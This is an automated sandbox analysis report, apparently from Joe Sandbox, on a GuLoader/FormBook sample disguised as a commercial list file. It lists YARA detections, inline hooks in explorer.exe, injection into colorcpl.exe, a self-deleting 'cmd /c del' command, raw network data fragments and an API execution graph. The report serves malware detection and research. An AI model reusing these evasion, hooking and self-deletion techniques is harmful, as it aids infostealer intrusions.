                                                                                                                                                                                2023-08-23 07:28:59 UTC187INData Raw: a9 7c 02 84 a9 47 09 ff c2 08 04 bc b1 54 f2 a3 75 36 7d ef 46 0e 16 fe 56 8c 96 ea b4 83 79 f5 77 23 5d 2e f6 82 2d f9 25 03 8a 8a ce e9 11 09 4e e6 29 ce e3 89 c4 fa 98 db a3 22 ba 22 95 6d c2 62 01 e9 b2 d4 b9 1c bd 35 84 93 01 f8 4e e8 11 87 5c 51 88 98 e2 db 20 9e 5b 62 0b e3 a2 d0 9e e2 9d ac ab b9 54 d2 f2 cc 5b e3 4a f7 c3 64 8d 64 42 8f 46 c7 ec 01 3f e2 29 d3 4c 2d c9 76 86 17 a9 ee 31 90 4b 42 77 1a 8c a8 ce 69 20 05 01 29 72 e7 8b 9e 9b 2b dd e6 df ae 9e 59 d2 80 63 a0 02 87 88 1d fe 25 87 04 ce 20 32 fb aa b5 0e 8f ec ef e4 1b 77 79 68 20 44 b9 e0 88 42 4a 50 24 28 e4 4d a3 39 25 0f 4d 94 1d a2 48 37 b9 36 22 88 28 88 d3 02 87 0d 12 90 63 be 57 e3 72 90 34 b6 31 98 f9 ce 48 44 b7 5f 14 c5 b3 97 39 54 40 30 dc 93 22 8e ee ee 43 a6 e4 28 93 a3
                                                                                                                                                                                Data Ascii: |GTu6}FVyw#].-%N)""mb5N\Q [bT[JddBF?)L-v1KBwi )r+Yc% 2wyh DBJP$(M9%MH76"(cWr41HD_9T@0"C(
                                                                                                                                                                                2023-08-23 07:28:59 UTC188INData Raw: e8 d1 a9 11 af 14 d5 80 51 13 31 13 52 f1 cd 99 21 ef b5 ba 58 9f f9 f2 f1 47 0c 4f c4 58 e7 6f 32 75 5e 1a 3c b5 3d 52 31 5f 1e 80 b0 6e 72 3c ac 86 b0 c0 7d 36 f8 74 2f 76 48 c0 6b 5e b6 a4 30 c6 39 8c e4 8b 4e d1 4e 39 97 05 0e 1e cc 81 a1 a9 95 0d 68 8d 49 06 3c 79 dc 28 c7 9d 4b c3 68 55 e9 f6 80 35 32 70 75 ec 28 5a c9 b8 00 13 9c 12 fb d9 83 fd bf 7f 0f 93 77 62 11 9d 37 ff 7c 19 f8 bb 07 a2 09 6e e0 a6 23 d4 89 ed 95 35 5d 95 5d 3c b5 cc 46 a6 1c 72 03 28 38 5e 57 d0 d2 9d a9 98 07 27 fc aa 93 c1 14 b5 9a 5e f7 0c aa e2 15 03 d8 ca 7d ad a7 cc 53 52 53 a4 fe 56 19 db 23 23 b3 74 4f 99 a0 25 50 57 e6 82 19 1e c1 ff 8b 25 e6 08 ef 22 c2 3a bf 7f 7c 41 d8 04 85 16 c6 28 45 68 ba 56 47 19 94 15 ef 33 7c 08 83 1c 63 a6 05 3d 95 f6 70 b1 ce 0d f2 39 19
                                                                                                                                                                                Data Ascii: Q1R!XGOXo2u^<=R1_nr<}6t/vHk^09NN9hI<y(KhU52pu(Zwb7|n#5]]<Fr(8^W'^}SRSV##tO%PW%":|A(EhVG3|c=p9
                                                                                                                                                                                2023-08-23 07:28:59 UTC190INData Raw: 0c 8c d8 67 1b 5c 45 a5 a0 36 5e 78 91 44 03 b9 b7 0a f0 7e 79 0a 87 92 32 96 53 63 fb 05 12 00 50 5e eb c7 50 04 1c c9 09 36 43 46 f8 ea dc 4d 10 4a bb bb 2c ef 43 5d 3f 88 82 e9 c2 b0 4c ca 90 dd 02 32 c1 75 92 34 d0 f9 97 9e 7f d5 92 c3 33 30 b3 9c dd b0 5d e9 2d 2e 1b 75 cb b6 16 b5 6a a0 07 4b 8d c3 17 b9 4d 54 a8 a2 fa 4e f1 8a 26 fd c1 33 02 f5 7c 76 39 f4 ab d0 84 d2 54 ea 15 dc 77 01 47 ab e7 b4 6b a2 a3 80 9f 57 dd 51 94 25 77 65 61 d4 b7 ac 8f cf 07 8b 0c 11 c1 09 53 48 5f 19 ee 05 88 5a 55 4c 2c 92 e9 5c db 6e 15 7b ec c1 d4 fb 63 77 03 2c 88 00 3b 8a 23 89 02 84 33 4b 30 67 68 e2 7e 41 5d fb c2 91 22 37 5a 61 fe 19 43 36 ad c1 6a 26 96 a7 11 82 38 25 75 c7 20 a8 f1 d5 af 61 05 99 ec 05 f9 0b f8 bb 97 2a 46 c0 aa 7d ad 52 fe 57 21 1c c1 b3 fd
                                                                                                                                                                                Data Ascii: g\E6^xD~y2ScP^P6CFMJ,C]?L2u430]-.ujKMTN&3|v9TwGkWQ%weaSH_ZUL,\n{cw,;#3K0gh~A]"7ZaC6j&8%u a*F}RW!
                                                                                                                                                                                2023-08-23 07:28:59 UTC191INData Raw: 21 e3 67 2f f1 b3 b8 61 1a 20 22 13 83 f2 10 43 e6 f9 b0 e9 1b d9 a8 78 bb 7a 71 95 1f df b6 23 08 66 62 2a 29 bf 41 ea 29 6c 3e a7 92 04 a5 5a cd 86 ae 1a 4f 6d 74 b9 7a 38 1a 50 6a 0f af d9 1e b4 c8 f5 83 90 a3 22 e0 6b 29 b0 9a dc e3 3e 3d 71 d1 27 37 0b 04 6f d5 3f 3c 39 14 bd 19 ff a8 8e 8f f6 da f0 03 67 a9 ed 90 62 e9 42 cb 68 53 52 e8 2f 17 49 b4 95 32 30 e6 b5 c7 f9 61 e9 68 3f c8 31 13 31 26 05 67 87 f1 76 ab d6 a8 25 2b 8a 90 5e e2 b6 01 f2 1a 73 cb 5d 32 18 f9 7d 82 6c 32 46 53 60 8c f7 c9 fb 2f bf 58 35 88 ef 42 19 6c 7a
                                                                                                                                                                                Data Ascii: !g/a "Cxzq#fb*)A)l>ZOmtz8Pj"k)>=q'7o?<9gbBhSR/I20ah?11&gv%+^s]2}l2FS`/X5Blz


                                                                                                                                                                                Code Manipulations

                                                                                                                                                                                User Modules

                                                                                                                                                                                Hook Summary

                                                                                                                                                                                Function NameHook TypeActive in Processes
                                                                                                                                                                                PeekMessageAINLINEexplorer.exe
                                                                                                                                                                                PeekMessageWINLINEexplorer.exe
                                                                                                                                                                                GetMessageWINLINEexplorer.exe
                                                                                                                                                                                GetMessageAINLINEexplorer.exe

                                                                                                                                                                                Processes

                                                                                                                                                                                Process: explorer.exe, Module: user32.dll
                                                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x88 0x8E 0xE4
                                                                                                                                                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x80 0x0E 0xE4
                                                                                                                                                                                GetMessageWINLINE0x48 0x8B 0xB8 0x80 0x0E 0xE4
                                                                                                                                                                                GetMessageAINLINE0x48 0x8B 0xB8 0x88 0x8E 0xE4

                                                                                                                                                                                Statistics

                                                                                                                                                                                CPU Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                Memory Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                Behavior

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                System Behavior

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:0
                                                                                                                                                                                Start time:09:28:26
                                                                                                                                                                                Start date:23/08/2023
                                                                                                                                                                                Path:C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:696'162 bytes
                                                                                                                                                                                MD5 hash:EEBE8AF538E906F4F2422DFA7C448962
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.11502840826.00000000052CD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:2
                                                                                                                                                                                Start time:09:28:49
                                                                                                                                                                                Start date:23/08/2023
                                                                                                                                                                                Path:C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:696'162 bytes
                                                                                                                                                                                MD5 hash:EEBE8AF538E906F4F2422DFA7C448962
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:4
                                                                                                                                                                                Start time:09:28:59
                                                                                                                                                                                Start date:23/08/2023
                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                Imagebase:0x7ff74efd0000
                                                                                                                                                                                File size:4'849'904 bytes
                                                                                                                                                                                MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:5
                                                                                                                                                                                Start time:09:29:04
                                                                                                                                                                                Start date:23/08/2023
                                                                                                                                                                                Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                                                                Imagebase:0xde0000
                                                                                                                                                                                File size:86'528 bytes
                                                                                                                                                                                MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:6
                                                                                                                                                                                Start time:09:29:08
                                                                                                                                                                                Start date:23/08/2023
                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:/c del "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe"
                                                                                                                                                                                Imagebase:0x2d0000
                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:7
                                                                                                                                                                                Start time:09:29:08
                                                                                                                                                                                Start date:23/08/2023
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff687cd0000
                                                                                                                                                                                File size:875'008 bytes
                                                                                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Disassembly

                                                                                                                                                                                Reset < >

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:21.3%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:14.7%
                                                                                                                                                                                  Signature Coverage:25.7%
                                                                                                                                                                                  Total number of Nodes:1440
                                                                                                                                                                                  Total number of Limit Nodes:37
                                                                                                                                                                                  execution_graph 4594 10001000 4597 1000101b 4594->4597 4604 100014bb 4597->4604 4599 10001020 4600 10001024 4599->4600 4601 10001027 GlobalAlloc 4599->4601 4602 100014e2 3 API calls 4600->4602 4601->4600 4603 10001019 4602->4603 4606 100014c1 4604->4606 4605 100014c7 4605->4599 4606->4605 4607 100014d3 GlobalFree 4606->4607 4607->4599 3598 403a41 3599 403b94 3598->3599 3600 403a59 3598->3600 3602 403be5 3599->3602 3603 403ba5 GetDlgItem GetDlgItem 3599->3603 3600->3599 3601 403a65 3600->3601 3604 403a70 SetWindowPos 3601->3604 3605 403a83 3601->3605 3607 403c3f 3602->3607 3616 401389 2 API calls 3602->3616 3606 403f14 19 API calls 3603->3606 3604->3605 3609 403aa0 3605->3609 3610 403a88 ShowWindow 3605->3610 3611 403bcf SetClassLongA 3606->3611 3612 403b8f 3607->3612 3668 403f60 3607->3668 3613 403ac2 3609->3613 3614 403aa8 DestroyWindow 3609->3614 3610->3609 3615 40140b 2 API calls 3611->3615 3618 403ac7 SetWindowLongA 3613->3618 3619 403ad8 3613->3619 3617 403e9d 3614->3617 3615->3602 3620 403c17 3616->3620 3617->3612 3627 403ece ShowWindow 3617->3627 3618->3612 3624 403b81 3619->3624 3625 403ae4 GetDlgItem 3619->3625 3620->3607 3621 403c1b SendMessageA 3620->3621 3621->3612 3622 40140b 2 API calls 3638 403c51 3622->3638 3623 403e9f DestroyWindow EndDialog 3623->3617 3705 403f7b 3624->3705 3628 403b14 3625->3628 3629 403af7 SendMessageA IsWindowEnabled 3625->3629 3627->3612 3631 403b21 3628->3631 3632 403b68 SendMessageA 3628->3632 3633 403b34 3628->3633 3642 403b19 3628->3642 3629->3612 3629->3628 3631->3632 3631->3642 3632->3624 3635 403b51 3633->3635 3636 403b3c 3633->3636 3640 40140b 2 API calls 3635->3640 3699 40140b 3636->3699 3637 403b4f 3637->3624 3638->3612 3638->3622 3638->3623 3641 403f14 19 API calls 3638->3641 3659 403ddf DestroyWindow 3638->3659 3671 405d51 3638->3671 3689 403f14 3638->3689 3643 403b58 3640->3643 3641->3638 3702 403eed 3642->3702 3643->3624 3643->3642 3645 403ccc GetDlgItem 3646 403ce1 3645->3646 3647 403ce9 ShowWindow KiUserCallbackDispatcher 3645->3647 3646->3647 3692 403f36 KiUserCallbackDispatcher 3647->3692 3649 403d13 EnableWindow 3652 403d27 3649->3652 3650 403d2c GetSystemMenu EnableMenuItem SendMessageA 3651 403d5c SendMessageA 3650->3651 3650->3652 3651->3652 3652->3650 3693 403f49 SendMessageA 3652->3693 3694 405d2f lstrcpynA 3652->3694 3655 403d8a lstrlenA 3656 405d51 18 API calls 3655->3656 3657 403d9b SetWindowTextA 3656->3657 3695 401389 3657->3695 3659->3617 3660 403df9 CreateDialogParamA 3659->3660 3660->3617 3661 403e2c 3660->3661 3662 403f14 19 API calls 3661->3662 3663 403e37 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3662->3663 3664 401389 2 API calls 3663->3664 3665 403e7d 3664->3665 3665->3612 3666 403e85 ShowWindow 3665->3666 3667 403f60 SendMessageA 3666->3667 3667->3617 3669 403f78 3668->3669 3670 403f69 SendMessageA 3668->3670 3669->3638 3670->3669 3684 405d5e 3671->3684 3672 405f81 3673 405f96 3672->3673 3735 405d2f lstrcpynA 3672->3735 3673->3638 3675 405dff GetVersion 3675->3684 3676 405f58 lstrlenA 3676->3684 3679 405d51 10 API calls 3679->3676 3681 405e77 GetSystemDirectoryA 3681->3684 3682 405e8a GetWindowsDirectoryA 3682->3684 3684->3672 3684->3675 3684->3676 3684->3679 3684->3681 3684->3682 3685 405ebe SHGetSpecialFolderLocation 3684->3685 3686 405d51 10 API calls 3684->3686 3687 405f01 lstrcatA 3684->3687 3719 405c16 RegOpenKeyExA 3684->3719 3724 405f9a 3684->3724 3733 405c8d wsprintfA 3684->3733 3734 405d2f lstrcpynA 3684->3734 3685->3684 3688 405ed6 SHGetPathFromIDListA CoTaskMemFree 3685->3688 3686->3684 3687->3684 3688->3684 3690 405d51 18 API calls 3689->3690 3691 403f1f SetDlgItemTextA 3690->3691 3691->3645 3692->3649 3693->3652 3694->3655 3697 401390 3695->3697 3696 4013fe 3696->3638 3697->3696 3698 4013cb MulDiv SendMessageA 3697->3698 3698->3697 3700 401389 2 API calls 3699->3700 3701 401420 3700->3701 3701->3642 3703 403ef4 3702->3703 3704 403efa SendMessageA 3702->3704 3703->3704 3704->3637 3706 403f93 GetWindowLongA 3705->3706 3716 40401c 3705->3716 3707 403fa4 3706->3707 3706->3716 3708 403fb3 GetSysColor 3707->3708 3709 403fb6 3707->3709 3708->3709 3710 403fc6 SetBkMode 3709->3710 3711 403fbc SetTextColor 3709->3711 3712 403fe4 3710->3712 3713 403fde GetSysColor 3710->3713 3711->3710 3714 403ff5 3712->3714 3715 403feb SetBkColor 3712->3715 3713->3712 3714->3716 3717 404008 DeleteObject 3714->3717 3718 40400f CreateBrushIndirect 3714->3718 3715->3714 3716->3612 3717->3718 3718->3716 3720 405c87 3719->3720 3721 405c49 RegQueryValueExA 3719->3721 3720->3684 3722 405c6a RegCloseKey 3721->3722 3722->3720 3731 405fa6 3724->3731 3725 40600e 3726 406012 CharPrevA 3725->3726 3729 40602d 3725->3729 3726->3725 3727 406003 CharNextA 3727->3725 3727->3731 3729->3684 3730 405ff1 CharNextA 3730->3731 3731->3725 3731->3727 3731->3730 3732 405ffe CharNextA 3731->3732 3736 4057cc 3731->3736 3732->3727 3733->3684 3734->3684 3735->3673 3737 4057d2 3736->3737 3738 4057e5 3737->3738 3739 4057d8 CharNextA 3737->3739 3738->3731 3739->3737 4608 401cc2 4609 402a1d 18 API calls 4608->4609 4610 401cd2 SetWindowLongA 4609->4610 4611 4028cf 4610->4611 4612 401a43 4613 402a1d 18 API calls 4612->4613 4614 401a49 4613->4614 4615 402a1d 18 API calls 4614->4615 4616 4019f3 4615->4616 3740 401e44 3756 402a3a 3740->3756 3746 401eb0 CloseHandle 3750 4026a6 3746->3750 3747 401e5a 3747->3746 3748 401e79 WaitForSingleObject 3747->3748 3747->3750 3776 406104 3747->3776 3748->3747 3749 401e87 GetExitCodeProcess 3748->3749 3752 401ea4 3749->3752 3753 401e99 3749->3753 3752->3746 3755 401ea2 3752->3755 3780 405c8d wsprintfA 3753->3780 3755->3746 3757 402a46 3756->3757 3758 405d51 18 API calls 3757->3758 3759 402a67 3758->3759 3760 401e4a 3759->3760 3761 405f9a 5 API calls 3759->3761 3762 404f48 3760->3762 3761->3760 3763 404f63 3762->3763 3772 401e54 3762->3772 3764 404f80 lstrlenA 3763->3764 3765 405d51 18 API calls 3763->3765 3766 404fa9 3764->3766 3767 404f8e lstrlenA 3764->3767 3765->3764 3769 404fbc 3766->3769 3770 404faf SetWindowTextA 3766->3770 3768 404fa0 lstrcatA 3767->3768 3767->3772 3768->3766 3771 404fc2 SendMessageA SendMessageA SendMessageA 3769->3771 3769->3772 3770->3769 3771->3772 3773 4054c0 CreateProcessA 3772->3773 3774 4054f3 CloseHandle 3773->3774 3775 4054ff 3773->3775 3774->3775 3775->3747 3777 406121 PeekMessageA 3776->3777 3778 406131 3777->3778 3779 406117 DispatchMessageA 3777->3779 3778->3748 3779->3777 3780->3755 4617 402644 4618 40264a 4617->4618 4619 402652 FindClose 4618->4619 4620 4028cf 4618->4620 4619->4620 4621 4048c5 GetDlgItem GetDlgItem 4622 404917 7 API calls 4621->4622 4629 404b2f 4621->4629 4623 4049ba DeleteObject 4622->4623 4624 4049ad SendMessageA 4622->4624 4625 4049c3 4623->4625 4624->4623 4626 4049fa 4625->4626 4628 405d51 18 API calls 4625->4628 4630 403f14 19 API calls 4626->4630 4627 404c13 4631 404cbf 4627->4631 4642 404c6c SendMessageA 4627->4642 4662 404b22 4627->4662 4633 4049dc SendMessageA SendMessageA 4628->4633 4629->4627 4632 404ba0 4629->4632 4674 404813 SendMessageA 4629->4674 4636 404a0e 4630->4636 4634 404cd1 4631->4634 4635 404cc9 SendMessageA 4631->4635 4632->4627 4638 404c05 SendMessageA 4632->4638 4633->4625 4639 404cfa 4634->4639 4644 404ce3 ImageList_Destroy 4634->4644 4645 404cea 4634->4645 4635->4634 4641 403f14 19 API calls 4636->4641 4637 403f7b 8 API calls 4643 404eb5 4637->4643 4638->4627 4647 404e69 4639->4647 4668 404d35 4639->4668 4679 404893 4639->4679 4646 404a1c 4641->4646 4648 404c81 SendMessageA 4642->4648 4642->4662 4644->4645 4645->4639 4649 404cf3 GlobalFree 4645->4649 4650 404af0 GetWindowLongA SetWindowLongA 4646->4650 4657 404aea 4646->4657 4660 404a6b SendMessageA 4646->4660 4663 404aa7 SendMessageA 4646->4663 4664 404ab8 SendMessageA 4646->4664 4652 404e7b ShowWindow GetDlgItem ShowWindow 4647->4652 4647->4662 4655 404c94 4648->4655 4649->4639 4651 404b09 4650->4651 4653 404b27 4651->4653 4654 404b0f ShowWindow 4651->4654 4652->4662 4673 403f49 SendMessageA 4653->4673 4672 403f49 SendMessageA 4654->4672 4656 404ca5 SendMessageA 4655->4656 4656->4631 4657->4650 4657->4651 4660->4646 4662->4637 4663->4646 4664->4646 4665 404e3f InvalidateRect 4665->4647 4666 404e55 4665->4666 4688 4047ce 4666->4688 4667 404d63 SendMessageA 4671 404d79 4667->4671 4668->4667 4668->4671 4670 404ded SendMessageA SendMessageA 4670->4671 4671->4665 4671->4670 4672->4662 4673->4629 4675 404872 SendMessageA 4674->4675 4676 404836 GetMessagePos ScreenToClient SendMessageA 4674->4676 4677 40486a 4675->4677 4676->4677 4678 40486f 4676->4678 4677->4632 4678->4675 4691 405d2f lstrcpynA 4679->4691 4681 4048a6 4692 405c8d wsprintfA 4681->4692 4683 4048b0 4684 40140b 2 API calls 4683->4684 4685 4048b9 4684->4685 4693 405d2f lstrcpynA 4685->4693 4687 4048c0 4687->4668 4694 404709 4688->4694 4690 4047e3 4690->4647 4691->4681 4692->4683 4693->4687 4695 40471f 4694->4695 4696 405d51 18 API calls 4695->4696 4697 404783 4696->4697 4698 405d51 18 API calls 4697->4698 4699 40478e 4698->4699 4700 405d51 18 API calls 4699->4700 4701 4047a4 lstrlenA wsprintfA SetDlgItemTextA 4700->4701 4701->4690 4702 4026c6 4703 402a3a 18 API calls 4702->4703 4704 4026d4 4703->4704 4705 4026ea 4704->4705 4706 402a3a 18 API calls 4704->4706 4707 40597d 2 API calls 4705->4707 4706->4705 4708 4026f0 4707->4708 4730 4059a2 GetFileAttributesA CreateFileA 4708->4730 4710 4026fd 4711 4027a0 4710->4711 4712 402709 GlobalAlloc 4710->4712 4715 4027a8 DeleteFileA 4711->4715 4716 4027bb 4711->4716 4713 402722 4712->4713 4714 402797 CloseHandle 4712->4714 4731 4030c7 SetFilePointer 4713->4731 4714->4711 4715->4716 4718 402728 4719 4030b1 ReadFile 4718->4719 4720 402731 GlobalAlloc 4719->4720 4721 402741 4720->4721 4722 402775 4720->4722 4723 402e9f 32 API calls 4721->4723 4724 405a49 WriteFile 4722->4724 4729 40274e 4723->4729 4725 402781 GlobalFree 4724->4725 4726 402e9f 32 API calls 4725->4726 4727 402794 4726->4727 4727->4714 4728 40276c GlobalFree 4728->4722 4729->4728 4730->4710 4731->4718 4732 402847 4733 402a1d 18 API calls 4732->4733 4734 40284d 4733->4734 4735 40287e 4734->4735 4736 40285b 4734->4736 4739 4026a6 4734->4739 4737 405d51 18 API calls 4735->4737 4735->4739 4736->4739 4740 405c8d wsprintfA 4736->4740 4737->4739 4740->4739 4741 4022c7 4742 402a3a 18 API calls 4741->4742 4743 4022d8 4742->4743 4744 402a3a 18 API calls 4743->4744 4745 4022e1 4744->4745 4746 402a3a 18 API calls 4745->4746 4747 4022eb GetPrivateProfileStringA 4746->4747 4049 1000270b 4050 1000275b 4049->4050 4051 1000271b VirtualProtect 4049->4051 4051->4050 4751 1000180d 4752 10001830 4751->4752 4753 10001860 GlobalFree 4752->4753 4754 10001872 4752->4754 4753->4754 4755 10001266 2 API calls 4754->4755 4756 100019e3 GlobalFree GlobalFree 4755->4756 4492 401751 4493 402a3a 18 API calls 4492->4493 4494 401758 4493->4494 4495 401776 4494->4495 4496 40177e 4494->4496 4532 405d2f lstrcpynA 4495->4532 4533 405d2f lstrcpynA 4496->4533 4499 401789 4501 4057a1 3 API calls 4499->4501 4500 40177c 4503 405f9a 5 API calls 4500->4503 4502 40178f lstrcatA 4501->4502 4502->4500 4525 40179b 4503->4525 4504 406033 2 API calls 4504->4525 4505 4017dc 4507 40597d 2 API calls 4505->4507 4507->4525 4508 4017b2 CompareFileTime 4508->4525 4509 401876 4510 404f48 25 API calls 